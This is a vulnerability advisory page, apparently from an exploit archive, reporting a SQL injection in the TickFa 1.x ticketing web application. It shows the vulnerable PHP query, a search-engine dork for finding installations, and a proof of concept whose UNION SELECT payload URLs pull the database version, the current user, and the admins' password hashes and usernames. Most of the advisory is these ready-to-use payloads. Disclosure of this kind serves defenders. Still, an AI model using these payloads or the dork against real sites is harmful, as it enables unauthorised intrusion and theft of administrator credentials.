TickFa 1.x SQL Injection Vulnerability

2015.06.09
Credit: Mohammad Reza Espargham
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:\"تیکت برای بخش مورد نظر ایجاد نمایید\"

/* #[+] Author: Mohammad Reza Espargham #[+] Title: TickFa 1.x - SQL Injection Vulnerability #[+] Date: 26-04-2015 #[+] Vendor: http://tickfa.aftab.cc/ #[+] SoftWare Link : http://tickfa.aftab.cc/dl/tickfa.zip #[+] Type: WebAPP #[+] Tested on: KaliLinux (Debian) / curl 7.35.0 #[+] GHDB : intext:"تیکت برای بخش مورد نظر ایجاد نمایید" dash> */ [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] ticket.php Source $tid = $_REQUEST['tid']; $userid = $_SESSION['userid']; .... .... $reply = mysql_query("SELECT * FROM `".$dbprefix."answers` WHERE tid='$tid' order by date"); while($reply_row=mysql_fetch_array($reply)) { [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] //////////////// /// POC //// /////////////// 1. You Most register in website from this link http://site.com/register.php 2. You most login in website 3. send ticket 4. Your Vulnerabe Link http://site.com/ticket.php?action=read&tid={Ticket ID} http://site.com/ticket.php?action=read&tid=65' http://site.com/ticket.php?action=read&tid=65 union select 3,4,5,6,7,8,9,10,CONCAT_WS(CHAR(59),version(),current_user(),database()) from [profix]_admins http://site.com/ticket.php?action=read&tid=65 union select 1,2,3,4,5,6,7,8,9,10,group_concat(apass,0x23,auname) from [profix]_admins 5.END <3


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top